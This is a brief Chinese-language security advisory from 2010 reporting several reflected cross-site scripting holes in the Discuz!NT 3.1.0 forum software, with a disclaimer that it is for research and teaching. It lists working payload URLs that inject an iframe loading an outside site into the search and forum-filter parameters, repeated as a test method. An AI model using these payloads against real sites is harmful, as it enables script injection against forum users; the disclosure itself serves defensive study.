影响版本:
Discuz!NT 3.1.0漏洞描述:
1.在快速搜索区域的“板块”搜索提交跨站测试语句[">< p>
获得地址:http://localhost/bbs/forumsearch.aspx?q=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E
2.在论坛板块版面出随意选择一种浏览方式,然后修改或添加加入跨站语句,获得地址:
http://localhost/bbs/showforum.aspx?search=1&forumid=31&typeid=0&filter=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E&order=2
http:/localhost/bbs/showforum.aspx?search=1&forumid=54&typeid=0&filter=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E
<*参考http://bbs.seceye.org/viewthread.php?tid=116http://www.gohack.org*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!"><>
http://localhost/bbs/forumsearch.aspx?q=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E
http://localhost/bbs/showforum.aspx?search=1&forumid=31&typeid=0&filter=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E&order=2
http:/localhost/bbs/showforum.aspx?search=1&forumid=54&typeid=0&filter=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E
安全建议:
等待官方发补丁
-
检测Discuz!NT 3.1.0 存在多处跨站漏洞
post by 飞飞 / 2010-3-8 14:37 Monday
